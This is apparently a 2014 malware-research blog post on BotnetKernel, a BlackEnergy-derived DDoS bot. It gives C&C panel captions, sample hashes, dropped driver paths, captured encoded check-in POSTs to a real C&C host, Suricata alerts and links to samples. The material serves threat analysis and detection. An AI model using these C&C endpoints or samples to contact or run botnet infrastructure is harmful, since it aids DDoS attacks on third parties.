2014-06-21 - Ddos

BotnetKernel (MS:Win32/Phdet.S) an evolution of BlackEnergy



I didn't find any advert for what seems to be an evolution of the Ddos bot/botnet BlackEnergy : Microsoft:Backdoor:Win32/Phdet.S : BotnetKernel Bot.

Here is a C&C panel :

BotnetKernel C&C Panel : Control
BotnetKernel C&C Panel : Control - Stats by Countries
BotnetKernel C&C Panel : Control - Stats by Builds
BotnetKernel C&C Panel : Plugins
BotnetKernel C&C Panel : Plugins config : ddos

BotnetKernel C&C Panel : Plugins config : http
BotnetKernel C&C Panel : Plugins config : slow
BotnetKernel C&C Panel :bot list
BotnetKernel C&C Panel :bot list - Search (FR) - Cmd and Cfg on a bot
A sample (7626a97642e27b13d2d8a021661099f7) I met was pushed as a task inside an Andromeda (yes same Andromeda botnet that was pushing Neutrino bot)

Sandboxing it :


Force reboot captured by Cuckoo Sandbox
Dropped:
C:\WINDOWS\system32\drivers\nethost.sys - f4827d3fc17af67f390b59f5ed04622c
C:\WINDOWS\system32\DLL1.tmp

Traffic (pcap at the end) :

http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 101
Cache-Control: no-cache

hyrf=ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 118
Cache-Control: no-cache

nslaf=a8Cdb/EG37VtEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

zkn=a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php
POST /ya/getcfg.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: nav555asto.mcdir.ru
Content-Length: 116
Cache-Control: no-cache

oeh=a8Cdb/ER17VpEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
which fire ET Pro rules in Suricata :

06/21/2014-03:45:49.765657 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1072 -> 91.194.254.180:80
06/21/2014-03:45:47.325018 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 91.194.254.180:80
06/21/2014-03:45:48.563590 [**] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1071 -> 91.194.254.180:80
Files : Multiple BotnetKernel bot Sample. Pcap. Dropped Driver

Read more :
BlackEnergy Rootkit, Sort Of - 2014-06-13 - F-Secure
Nueva variante del rootkit Phdet.s de dificil deteciòn !!! - 2014-03-04 - SatInfo
MSRT December '12 - Phdet - 2012-12-11 - Scott Molenkamp - Microsoft
BlackEnergy Version 2 Analysis - 2010-03-10 - Joe Stewart - Dell Secureworks
Updated BlackEnergy DDos Botnet Kit - 2010-01-18 Dell
BlackEnergy DDoS Bot Analysis (PDF) - 2007-10 - Jose Nazario - Arbor.sert